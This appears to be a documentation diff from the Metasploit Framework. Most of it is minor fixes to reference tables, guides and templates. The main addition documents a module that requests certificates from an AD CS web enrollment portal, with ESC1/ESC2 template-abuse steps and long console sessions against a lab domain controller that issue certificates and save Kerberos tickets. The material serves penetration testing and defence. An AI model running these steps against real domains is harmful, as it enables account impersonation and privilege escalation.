+Although it is possible to globally setting common values with the `setg` command - and to individually override the ports on a per module basis, it is still an arduous task:
 
 ```
 setg RHOSTS x.x.x.x

docs/metasploit-framework.wiki/Module-Reference-Identifiers.md

@@ -1,26 +1,29 @@
 ## On this page
-* [List of supported reference identifiers](#list-of-supported-reference-identifiers)
-* [Code example of references in a module](#code-example-of-references-in-a-module)
+- [On this page](#on-this-page)
+- [List of supported reference identifiers](#list-of-supported-reference-identifiers)
+- [Code example of references in a module](#code-example-of-references-in-a-module)
 
 
 A reference in a Metasploit module is a source of information related to the module. This can be a link to the vulnerability advisory, a news article, a blog post about a specific technique the module uses, a specific tweet, etc. The more you have the better. However, you should not use this as a form of advertisement.
 
 ## List of supported reference identifiers 
 
-ID  | Source | Code Example
-------------- | ------------- | -------------
-CVE  | cvedetails.com | ```['CVE', '2014-9999']```
-CWE | cwe.mitre.org | ```['CWE', '90']```
-BID | securityfocus.com | ```['BID', '1234']```
-MSB | technet.microsoft.com | ```['MSB', 'MS13-055']```
-EDB | exploit-db.com | ```['EDB', '1337']```
-US-CERT-VU | kb.cert.org | ```['US-CERT-VU', '800113']```
-ZDI | zerodayinitiative.com | ```['ZDI', '10-123']```
-WPVDB | wpvulndb.com | ```['WPVDB', '7615']```
-PACKETSTORM | packetstormsecurity.com | ```['PACKETSTORM', '132721']```
-GHSA | github.com/advisories or github.com/owner/repo/security/advisories | ```['GHSA', 'xxxx-xxxx-xxxx']``` or ```['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo']```
-URL | anything | ```['URL', 'http://example.com/blog.php?id=123']```
-AKA (_deprecated_*) | anything | ~~`['AKA', 'shellshock']`~~
+| ID                  | Source                                                             | Code Example                                                                       |
+| ------------------- | ------------------------------------------------------------------ | ---------------------------------------------------------------------------------- |
+| CVE                 | cvedetails.com                                                     | ```['CVE', '2014-9999']```                                                         |
+| CWE                 | cwe.mitre.org                                                      | ```['CWE', '90']```                                                                |
+| BID                 | securityfocus.com                                                  | ```['BID', '1234']```                                                              |
+| MSB                 | technet.microsoft.com                                              | ```['MSB', 'MS13-055']```                                                          |
+| EDB                 | exploit-db.com                                                     | ```['EDB', '1337']```                                                              |
+| US-CERT-VU          | kb.cert.org                                                        | ```['US-CERT-VU', '800113']```                                                     |
+| ZDI                 | zerodayinitiative.com                                              | ```['ZDI', '10-123']```                                                            |
+| WPVDB               | wpvulndb.com                                                       | ```['WPVDB', '7615']```                                                            |
+| PACKETSTORM         | packetstormsecurity.com                                            | ```['PACKETSTORM', '132721']```                                                    |
+| GHSA                | github.com/advisories or github.com/owner/repo/security/advisories | ```['GHSA', 'xxxx-xxxx-xxxx']``` or ```['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo']``` |
+| OSV                 | osv.dev                                                            | ```['OSV', 'GHSA-xxxx-xxxx-xxxx']```                                               |
+| ATT&CK              | attack.mitre.org                                                   | ```['ATT&CK', 'T1190']```                                                          |
+| URL                 | anything                                                           | ```['URL', 'http://example.com/blog.php?id=123']```                                |
+| AKA (_deprecated_*) | anything                                                           | ~~`['AKA', 'shellshock']`~~                                                        |
 
 > **Good to know**    
 > AKA names for modules are no longer stored as a reference identifier, but rather in the `Notes` metadata field as shown in the example below.
@@ -42,8 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [ 'Unknown' ],
         'References' => [
-          [ 'CVE', '2014-9999' ],
+          ['CVE', '2014-9999'],
           ['BID', '1234'],
+          ['GHSA', 'xxxx-xxxx-xxxx'],               # global advisory
+          ['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo'], # repository-scoped advisory
           ['URL', 'http://example.com/blog.php?id=123']
         ],
         'Platform' => 'win',

docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md

@@ -444,7 +444,7 @@ Now edit the `proxychains` configuration file located at `/etc/proxychains.conf`
 socks5 127.0.0.1 1080
 ```
 
-The final final should look something like this:
+The final file should look something like this:
 
 ```ini
 # proxychains.conf  VER 3.1
@@ -567,7 +567,7 @@ index.html             100%[===========================>]  57.34K  --.-KB/s    i
 ```
 
 ### Scanning
-For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UPD traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
+For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UDP traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
 
 For Nmap and Zenmap, the below example shows the commands can be used. It is best to be selective on ports to scan since scanning through the proxy tunnel can be slow.
 

docs/metasploit-framework.wiki/Writing-External-GoLang-Modules.md

@@ -17,16 +17,16 @@ Contributing modules in [GO](https://golang.org/) can be achieved in a few simpl
 import "metasploit/module"
 func main() {
   metadata := &module.Metadata{
-    Name: "<module name",
+    Name: "<module name>",
     Description: "<describe>",
     Authors: []string{"<author 1>", "<author 2>"},
-    Date: "<date module written",
+    Date: "<date module written>",
     Type:"<module type>",
     Privileged:  <true|false>,
     References:  []module.Reference{},
     Options: map[string]module.Option{	
-      "<option 1":     {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},		
-      "<option 2":     {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
+      "<option 1>":     {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},		
+      "<option 2>":     {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
   }}
 
   module.Init(metadata, <the entry method to your module>)

docs/metasploit-framework.wiki/Writing-External-Metasploit-Modules.md

@@ -151,7 +151,7 @@ Run
     "id": {"type": "string"},
     "method": {"enum": ["run"]},
     "params": {
-      "type": "object"
+      "type": "object",
       "additionalProperties": false,
       "patternProperties": {
         "^[^=]*$": {
@@ -181,7 +181,7 @@ Run
     "id": {"type": "string"},
     "result": {
       "type": "object",
-      "required": ["message"]
+      "required": ["message"],
       "properties": {
         "message": {"type": "string"},
         "return": {"type": "string"}

docs/navigation.rb

@@ -448,6 +448,9 @@ NAVIGATION_CONFIG = [
           {
             path: 'How-to-use-Metasploit-with-ngrok.md'
           },
+          {
+            path: 'How-to-use-Metasploit-MCP-Server.md'
+          },
         ]
       },
     ]

documentation/modules/auxiliary/admin/http/web_enrollment_cert.md

@@ -0,0 +1,485 @@
+## Vulnerable Application
+This module makes authenticated requests to an Active Directory Certificate Services Web enrollment portal to gain
+a list of available templates and/or generate certificates based on the available templates.
+This is the same basic action as `auxiliary/server/relay/esc8` but rather then relaying NTLM credentials, we are
+authenticating with credentials we have.
+
+## Verification Steps
+
+### NTLM
+1. Install and configure the application
+    * See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
+2. Start `msfconsole`
+2. Do: `use auxiliary/admin/http/web_enrollment_cert`
+3. Set the `RHOSTS` option to the AD CS Web Enrollment server
+4. Set the `HTTP::Auth` option to `ntlm`
+4. Set the `HttpUsername` option to a valid user
+4. Set the `HttpPassword` option to a valid user password
+4. Set `MODE`, `CERT_TEMPLATE`, and `TARGETURI` to the desired settings.
+
+### Kerberos
+1. Install and configure the application
+    * See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
+2. Start `msfconsole`
+2. Do: `use auxiliary/admin/http/web_enrollment_cert`
+3. Set the `RHOSTS` option to the AD CS Web Enrollment server
+4. Set the `HTTP::Auth` option to `kerberos`
+5. Set the `DOMAIN` option to the FQDN
+6. Set the `DomainControllerRhost` if it is not available through DNS
+4. Set the `HttpUsername` option to a valid user
+4. Set the `HttpPassword` option to a valid user password
+4. Set `MODE`, `CERT_TEMPLATE`, and `TARGETURI` to the desired settings.
+
+### ESC1 
+1. Install and configure the application with ESC1 vulnerable template
+   * https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
+2. Follow steps above based on authentication type
+4. Set `MODE` to `SPECIFIC_TEMPLATE`
+3. Set `CERT_TEMPLATE` to a template vulnerable to ESC1
+4. Set `ALT_UPN` to the desired User
+5. Set `ALT_SID` to the desired SID, if necessary
+6. Set `ALT_DNS` if required
+
+### ESC2
+1. Install and configure the application with ESC2 vulnerable template
+    * https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
+2. Follow steps above based on authentication type
+4. Set `MODE` to `SPECIFIC_TEMPLATE`
+3. Set `CERT_TEMPLATE` to a template vulnerable to ESC2
+4. Set `ON_BEHALF_OF` to the desired User
+5. Set `PFX` to the desired certificate file
+
+## Options
+
+### MODE
+The issue mode. This controls what the module will do once an authenticated session is established to the Web Enrollment
+server. Must be one of the following options:
+
+* ALL: Enumerate all available certificate templates and then issue each of them
+* QUERY_ONLY: Enumerate all available certificate templates but do not issue any.  Not all certificate templates
+  available for use will be displayed; templates with the flag CT_FLAG_MACHINE_TYPE set will not show available and
+  include `Machine` (AKA `Computer`) and `DomainController`
+* SPECIFIC_TEMPLATE: Issue the certificate template specified in the `CERT_TEMPLATE` option
+
+### CERT_TEMPLATE
+The template to issue if MODE is SPECIFIC_TEMPLATE.
+
+## Scenarios
+
+### Windows 2019
+#### NTLM with MODE ALL
+```msf
+msf > use auxiliary/admin/http/web_enrollment_cert 
+msf auxiliary(admin/http/web_enrollment_cert) > set rhost 10.5.132.180
+rhost => 10.5.132.180
+msf auxiliary(admin/http/web_enrollment_cert) > set httpusername Administrator
+httpusername => Administrator
+msf auxiliary(admin/http/web_enrollment_cert) > set httppassword v3Mpassword
+httppassword => v3Mpassword
+msf auxiliary(admin/http/web_enrollment_cert) > set DOMAIN EXAMPLE
+DOMAIN => EXAMPLE
+msf auxiliary(admin/http/web_enrollment_cert) > set MODE ALL 
+MODE => ALL
+msf auxiliary(admin/http/web_enrollment_cert) > set HTTP::AUTH ntlm 
+HTTP::AUTH => ntlm
+msf auxiliary(admin/http/web_enrollment_cert) > show options
+
+Module options (auxiliary/admin/http/web_enrollment_cert):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   ALT_DNS                        no        Alternative certificate DNS
+   ALT_SID                        no        Alternative object SID
+   ALT_UPN                        no        Alternative certificate UPN (format: USER@DOMAIN)
+   HttpPassword  v3Mpassword      no        The HTTP password to specify for authentication
+   HttpUsername  Administrator    no        The HTTP username to specify for authentication
+   MODE          ALL              yes       The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
+   ON_BEHALF_OF                   no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX                            no        Certificate to request on behalf of
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5
+                                            h, sapni, socks4, http, socks5
+   RHOSTS        10.5.132.180     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         80               yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /certsrv/        yes       The URI for the cert server.
+   THREADS       1                yes       The number of concurrent threads (max one per host)
+   VHOST                          no        HTTP server virtual host
+
+
+   When MODE is SPECIFIC_TEMPLATE:
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CERT_TEMPLATE                   no        The template to issue if MODE is SPECIFIC_TEMPLATE.
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/http/web_enrollment_cert) > run
+[*] Retrieving available template list, this may take a few minutes
+[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
+[+] Available Certificates for EXAMPLE\\Administrator on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
+[+] Certificate generated using template User and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template User saved to /home/tmoose/.msf4/loot/20260116142051_default_10.5.132.180_windows.ad.cs_263748.pfx
+[+] Certificate generated using template EFS and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template EFS saved to /home/tmoose/.msf4/loot/20260116142053_default_10.5.132.180_windows.ad.cs_150446.pfx
+[+] Certificate generated using template Administrator and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template Administrator saved to /home/tmoose/.msf4/loot/20260116142055_default_10.5.132.180_windows.ad.cs_586273.pfx
+[+] Certificate generated using template EFSRecovery and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template EFSRecovery saved to /home/tmoose/.msf4/loot/20260116142057_default_10.5.132.180_windows.ad.cs_077399.pfx
+[+] Certificate generated using template ESC16_1 and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template ESC16_1 saved to /home/tmoose/.msf4/loot/20260116142101_default_10.5.132.180_windows.ad.cs_832421.pfx
+[+] Certificate generated using template ESC2-Template and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template ESC2-Template saved to /home/tmoose/.msf4/loot/20260116142102_default_10.5.132.180_windows.ad.cs_548200.pfx
+[+] Certificate generated using template WebServer and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template WebServer saved to /home/tmoose/.msf4/loot/20260116142103_default_10.5.132.180_windows.ad.cs_191863.pfx
+[+] Certificate generated using template SubCA and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template SubCA saved to /home/tmoose/.msf4/loot/20260116142105_default_10.5.132.180_windows.ad.cs_300086.pfx
+[+] Certificate generated using template ESC1-Template and EXAMPLE\\Administrator
+[+] Certificate for EXAMPLE\\Administrator using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116142106_default_10.5.132.180_windows.ad.cs_017489.pfx
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+msf auxiliary(admin/http/web_enrollment_cert) > 
+
+```
+
+#### Kerberos MODE:ALL
+```msf
+msf auxiliary(admin/http/web_enrollment_cert) > show options
+
+Module options (auxiliary/admin/http/web_enrollment_cert):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   ALT_DNS                        no        Alternative certificate DNS
+   ALT_SID                        no        Alternative object SID
+   ALT_UPN                        no        Alternative certificate UPN (format: USER@DOMAIN)
+   HttpPassword  v3Mpassword      no        The HTTP password to specify for authentication
+   HttpUsername  Administrator    no        The HTTP username to specify for authentication
+   MODE          ALL              yes       The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
+   ON_BEHALF_OF                   no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX                            no        Certificate to request on behalf of
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5
+                                            h, sapni, socks4, http, socks5
+   RHOSTS        10.5.132.180     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         80               yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /certsrv/        yes       The URI for the cert server.
+   THREADS       1                yes       The number of concurrent threads (max one per host)
+   VHOST                          no        HTTP server virtual host
+
+
+   When MODE is SPECIFIC_TEMPLATE:
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CERT_TEMPLATE                   no        The template to issue if MODE is SPECIFIC_TEMPLATE.
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/http/web_enrollment_cert) > show advanced
+
+Module advanced options (auxiliary/admin/http/web_enrollment_cert):
+
+   Name                     Current Setting                    Required  Description
+   ----                     ---------------                    --------  -----------
+   DOMAIN                   example.com                        yes       The domain to use for Windows authentication (Must be FQDN
+                                                                          if HTTP:Auth is Kerberos)
+   DigestAlgorithm          SHA256                             yes       The digest algorithm to use (Accepted: SHA1, SHA256)
+   DigestAuthIIS            true                               no        Conform to IIS, should work for most servers. Only set to
+                                                                         false for non-IIS servers
+   FingerprintCheck         true                               no        Conduct a pre-exploit fingerprint verification
+   HTTP::Auth               kerberos                           yes       The Authentication mechanism to use (Accepted: auto, ntlm,
+                                                                          kerberos, plaintext, none)
+   HttpClientTimeout                                           no        HTTP connection and receive timeout
+   HttpRawHeaders                                              no        Path to ERB-templatized raw headers to append to existing
+                                                                         headers
+   HttpTrace                false                              no        Show the raw HTTP requests and responses
+   HttpTraceColors          red/blu                            no        HTTP request and response colors for HttpTrace (unset to d
+                                                                         isable)
+   HttpTraceHeadersOnly     false                              no        Show HTTP headers only in HttpTrace
+   SSLKeyLogFile                                               no        The SSL key log file
+   SSLServerNameIndication                                     no        SSL/TLS Server Name Indication (SNI)
+   SSLVersion               Auto                               yes       Specify the version of SSL/TLS to be used (Auto, TLS and S
+                                                                         SL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3
+                                                                         , TLS1, TLS1.1, TLS1.2)
+   ShowProgress             true                               yes       Display progress messages during a scan
+   ShowProgressPercent      10                                 yes       The interval in percent that progress should be shown
+   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac  no        The User-Agent header to use for all requests
+                             OS X 10_15_7) AppleWebKit/537.36
+                             (KHTML, like Gecko) Chrome/131.0
+                            .0.0 Safari/537.36
+   VERBOSE                  false                              no        Enable detailed status messages
+   WORKSPACE                                                   no        Specify the workspace for this module
+
+
+   When HTTP::Auth is kerberos:
+
+   Name                            Current Setting                 Required  Description
+   ----                            ---------------                 --------  -----------
+   DomainControllerRhost           10.5.132.180                    no        The resolvable rhost for the Domain Controller
+   HTTP::Krb5Ccname                                                no        The ccache file to use for kerberos authentication
+   HTTP::KrbOfferedEncryptionType  AES256,AES128,RC4-HMAC,DES-CBC  yes       Kerberos encryption types to offer
+   s                               -MD5,DES3-CBC-SHA1
+   HTTP::Rhostname                 WIN-DRC9HCDIMAT                 no        The rhostname which is required for kerberos - the SPN
+   KrbCacheMode                    read-write                      yes       Kerberos ticket cache storage mode (Accepted: none, re
+                                                                             ad-only, write-only, read-write)
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/http/web_enrollment_cert) > run
+[*] Retrieving available template list, this may take a few minutes
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143502_default_10.5.132.180_mit.kerberos.cca_557407.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143502_default_10.5.132.180_mit.kerberos.cca_545138.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
+[+] Available Certificates for  on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143520_default_10.5.132.180_mit.kerberos.cca_606180.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143520_default_10.5.132.180_mit.kerberos.cca_023162.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template User and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143537_default_10.5.132.180_mit.kerberos.cca_548243.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143537_default_10.5.132.180_mit.kerberos.cca_843349.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template User saved to /home/tmoose/.msf4/loot/20260116143538_default_10.5.132.180_windows.ad.cs_760252.pfx
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143541_default_10.5.132.180_mit.kerberos.cca_236912.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143541_default_10.5.132.180_mit.kerberos.cca_237890.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template EFS and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143543_default_10.5.132.180_mit.kerberos.cca_360144.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143543_default_10.5.132.180_mit.kerberos.cca_009299.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template EFS saved to /home/tmoose/.msf4/loot/20260116143544_default_10.5.132.180_windows.ad.cs_150360.pfx
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143546_default_10.5.132.180_mit.kerberos.cca_444407.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143547_default_10.5.132.180_mit.kerberos.cca_460069.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template Administrator and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143548_default_10.5.132.180_mit.kerberos.cca_941754.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143549_default_10.5.132.180_mit.kerberos.cca_484741.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template Administrator saved to /home/tmoose/.msf4/loot/20260116143549_default_10.5.132.180_windows.ad.cs_088506.pfx
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143552_default_10.5.132.180_mit.kerberos.cca_665940.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143552_default_10.5.132.180_mit.kerberos.cca_324874.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template EFSRecovery and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_mit.kerberos.cca_559229.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_mit.kerberos.cca_295382.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template EFSRecovery saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_windows.ad.cs_477946.pfx
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143556_default_10.5.132.180_mit.kerberos.cca_645978.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143557_default_10.5.132.180_mit.kerberos.cca_838211.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template ESC16_1 and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143558_default_10.5.132.180_mit.kerberos.cca_485891.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143559_default_10.5.132.180_mit.kerberos.cca_709913.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template ESC16_1 saved to /home/tmoose/.msf4/loot/20260116143559_default_10.5.132.180_windows.ad.cs_818976.pfx
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143601_default_10.5.132.180_mit.kerberos.cca_952232.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143601_default_10.5.132.180_mit.kerberos.cca_169000.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template ESC2-Template and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143603_default_10.5.132.180_mit.kerberos.cca_042983.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143603_default_10.5.132.180_mit.kerberos.cca_512322.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template ESC2-Template saved to /home/tmoose/.msf4/loot/20260116143604_default_10.5.132.180_windows.ad.cs_206522.pfx
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143607_default_10.5.132.180_mit.kerberos.cca_893032.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143607_default_10.5.132.180_mit.kerberos.cca_156631.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template WebServer and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143608_default_10.5.132.180_mit.kerberos.cca_982799.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143609_default_10.5.132.180_mit.kerberos.cca_247412.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template WebServer saved to /home/tmoose/.msf4/loot/20260116143609_default_10.5.132.180_windows.ad.cs_955795.pfx
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143612_default_10.5.132.180_mit.kerberos.cca_119902.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143613_default_10.5.132.180_mit.kerberos.cca_847610.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template SubCA and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143614_default_10.5.132.180_mit.kerberos.cca_417480.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143615_default_10.5.132.180_mit.kerberos.cca_766015.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template SubCA saved to /home/tmoose/.msf4/loot/20260116143615_default_10.5.132.180_windows.ad.cs_888697.pfx
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143617_default_10.5.132.180_mit.kerberos.cca_866496.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143617_default_10.5.132.180_mit.kerberos.cca_528295.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template ESC1-Template and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143619_default_10.5.132.180_mit.kerberos.cca_103101.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143619_default_10.5.132.180_mit.kerberos.cca_871753.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116143620_default_10.5.132.180_windows.ad.cs_135453.pfx
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(admin/http/web_enrollment_cert) > 
+
+```
+
+# Kerberos, ESC1
+```msf
+msf auxiliary(admin/http/web_enrollment_cert) > set MODE QUERY_ONLY 
+MODE => QUERY_ONLY
+msf auxiliary(admin/http/web_enrollment_cert) > run
+[*] Retrieving available template list, this may take a few minutes
